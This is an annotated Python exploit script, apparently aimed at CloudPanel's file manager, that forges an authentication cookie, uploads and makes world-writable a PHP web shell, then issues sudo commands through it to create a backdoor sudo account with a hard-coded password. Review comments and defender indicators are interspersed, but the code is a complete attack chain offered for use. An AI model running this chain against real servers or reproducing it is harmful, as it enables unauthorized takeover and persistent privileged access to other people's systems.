import subprocess, argparse
import warnings ,os, sys
import ctypes, platform, requests
from colorama import Fore, Back, Style
from datetime import date
# Silence every Python warning for the whole run. The HTTP calls in this file
# pass verify=False, so this also hides the certificate-validation warnings
# those calls would otherwise emit.
warnings.filterwarnings('ignore')
parser = argparse.ArgumentParser()

# Local helper command run by execPHP(); Crypto.php is not part of this file.
cmd = '/usr/bin/php8.1 Crypto.php'
# URL prefix that every file-manager request below is built on.
default_path = '/file-manager/'
# Passed to the helper as its single argument on the second execPHP() call.
username = 'clp'
# Placeholder; StartPage() overwrites it with the --target value.
tgt = ''

# Shell commands this script later sends through the uploaded web shell.
# Host-side indicators for responders: a local account named `zeroday` whose
# home directory is created under /tmp and which is added to the sudo group.
user_add = "useradd zeroday -s /bin/bash -b /tmp"
user_passwd = "echo 'Etharus@1337%0AEtharus@1337' | passwd zeroday"
user_mod = "usermod -aG sudo zeroday"
gains = [
    f"sudo su -c '{user_add}'",
    f'sudo su -c "{user_passwd}"',
    f"sudo su -c '{user_mod}'",
]
def execPHP(txt=False):
    """Run the local PHP helper and return its decoded standard output.

    Called without an argument, the module-level ``cmd`` is executed as is.
    Called with ``txt``, that string is appended to ``cmd`` (separated by one
    space) before the helper is started.

    The command is split on single spaces and handed to ``Popen`` as an argv
    list, so no shell is involved; a ``txt`` containing spaces becomes several
    separate arguments.

    NOTE(review): the append rebinds the *global* ``cmd``, so the extra
    argument stays in place for every later call in the same process.
    """
    global cmd
    # Equality (not identity) is kept on purpose so that the same values are
    # treated as "no argument" as before, e.g. 0 as well as False.
    if not (False == txt):
        cmd = ' '.join((cmd, txt))
    argv = cmd.split(' ')
    child = subprocess.Popen(argv, stdout=subprocess.PIPE)
    # Blocks until the helper closes stdout; stderr is not captured.
    return child.stdout.read().decode('utf-8')
def exploit():
    """Run the file-manager request chain against the host named in ``tgt``.

    What the code below does, in order, each step gated on HTTP 200 from the
    previous one:

    1. GET ``/file-manager/`` with a ``clp-fm`` cookie whose value is the
       output of ``execPHP()``; any other status prints 'Not Vulnerable...'.
    2. POST ``/file-manager/backend/makefile`` to create ``shell.php`` under
       ``/htdocs/app/files/public/``.
    3. POST ``/file-manager/backend/text`` with the bytes of the local file
       ``shell.php`` as the new file's content.
    4. POST ``/file-manager/backend/permissions`` to set mode ``0777``.
    5. GET ``/shell.php`` and, on 200, one GET per entry of ``gains`` with the
       command in the ``cmd`` query parameter.

    For defenders the same sequence is what to look for: access-log entries
    for the three ``backend/`` endpoints from one client followed by requests
    to ``/shell.php?cmd=``, a new world-writable PHP file in the public
    directory, and the local account described next to ``gains``.

    NOTE(review): how Crypto.php derives the cookie value is not shown in this
    file. Indentation was lost in this listing; the nesting here is
    reconstructed from the try/except pairing and should be confirmed against
    the original file (in particular whether the final 'SSH Login' print sits
    inside or after the ``for`` loop).
    """
    global tgt,default_path,username
    # Every '/' is stripped from the target, so only host[:port] survives.
    target = 'https://' + tgt.replace('/','')
    # Computed but never used in this function.
    ipTarget = tgt.split(':')[0]
    crypto = execPHP()
    cookie = {'clp-fm':crypto}
    try:
        # verify=False on every request: the TLS certificate is not validated.
        request = requests.get(target+default_path,cookies=cookie,verify=False,timeout=5)
        if request.status_code == 200:
            up_data = {'id':'/htdocs/app/files/public/','name':'shell.php'}
            # Second helper run, this time with `username` appended to the
            # command line; its output replaces the cookie for all later calls.
            new_ck = {'clp-fm':execPHP(username)}
            try:
                new_request = requests.post(target+default_path+'backend/makefile',cookies=new_ck,data=up_data,verify=False,timeout=5)
                if new_request.status_code == 200:
                    # The local file handle is never closed explicitly. A
                    # missing shell.php raises here and is reported by the
                    # 'creating file' handler below as a connection error.
                    cdata = {'id':'/htdocs/app/files/public/shell.php','content':open('shell.php','rb').read()}
                    try:
                        crequest = requests.post(target+default_path+'backend/text',cookies=new_ck,data=cdata,verify=False,timeout=5)
                        if crequest.status_code == 200:
                            pdata = {'id':'/htdocs/app/files/public/shell.php','permissions':'0777'}
                            try:
                                prequest = requests.post(target+default_path+'backend/permissions',cookies=new_ck,data=pdata,verify=False,timeout=5)
                                if prequest.status_code == 200:
                                    # No cookie is sent from here on: the file
                                    # is requested straight from the web root.
                                    shell_check = requests.get(target+'/shell.php',verify=False,timeout=5)
                                    if shell_check.status_code == 200:
                                        print(Style.BRIGHT + Fore.GREEN + '[+] WebShell : ' + target+'/shell.php')
                                        # Responses are discarded, so the
                                        # success line below is printed whether
                                        # or not the commands actually ran.
                                        for gain in gains:
                                            requests.get(target+'/shell.php?cmd='+gain,verify=False,timeout=10)
                                        print(Style.BRIGHT + Fore.GREEN + '[+] SSH Login : user=zeroday,pass=Etharus@1337')
                            # Each bare `except:` also traps KeyboardInterrupt,
                            # SystemExit and non-network errors, so the
                            # 'Connection error' wording can be misleading.
                            except:
                                print(Style.BRIGHT + Fore.RED+'Connection error while changing permission!')
                    except:
                        print(Style.BRIGHT + Fore.RED+'Connection error while trying insert contents!')
            except:
                print(Style.BRIGHT + Fore.RED+'Connection error while trying creating file!')
        else:
            # Any non-200 answer to the first request is read as "not
            # vulnerable"; a non-200 at a later step prints nothing at all.
            print(Style.BRIGHT + Fore.RED+'Not Vulnerable...')
    except:
        print(Style.BRIGHT + Fore.RED+'Connection error!')
def StartPage():
    """Read the required ``-T/--target`` option and hand over to ``exploit()``.

    The parsed value is stored in the module-level ``tgt``, which ``exploit()``
    reads. ``prt`` is declared global here but is never assigned or read in
    this function.
    """
    global tgt, prt
    parser.add_argument(
        '-T', '--target',
        dest='tgt',
        type=str,
        required=True,
        default=None,
        help='Ex: 127.0.0.1:8443',
    )
    # argparse exits the process itself when the required option is missing.
    tgt = parser.parse_args().tgt
    exploit()
if __name__ == '__main__':
    today = date.today()
    d2 = today.strftime("%B %d, %Y")
    # Clear the terminal and set its title before printing the banner.
    # NOTE(review): every platform other than Linux takes the first branch,
    # but ctypes.windll exists only on Windows, so e.g. macOS fails here.
    if platform.system() != 'Linux':
        os.system('cls')
        ctypes.windll.kernel32.SetConsoleTitleW(f'CLP 0Day | {d2}')
    else:
        os.system('clear')
        sys.stdout.write("\x1b]2;CLP 0Day {}\x07".format(d2))
    # Banner text is reproduced exactly as it appears in this listing.
    banner = f"""{Style.BRIGHT + Fore.GREEN}
______ _____ _____ __ _
/ ____/___ _/ / (_)___ ____ _/ ___// /__(_)__ _____
/ /_ / __ `/ / / / __ \/ __ `/\__ \/ //_/ / _ \/ ___/
/ __/ / /_/ / / / / / / / /_/ /___/ / ,< / / __(__ )
/_/ \__,_/_/_/_/_/ /_/\__, //____/_/|_/_/\___/____/
/____/ CloudPanel 0day Version : 2.0.0 >= 2.3.0
{Style.BRIGHT + Fore.MAGENTA}
░█▀▄░█▀█░▀█▀░█▀█░█▀▀░█░█░░░░█▄█░█░█
░█░█░█▀█░░█░░█▀█░█░░░█▀▄░░░░█░█░░█░
░▀▀░░▀░▀░░▀░░▀░▀░▀▀▀░▀░▀░▀░░▀░▀░░▀░
{Style.BRIGHT + Fore.WHITE}"""
    print(banner)
    StartPage()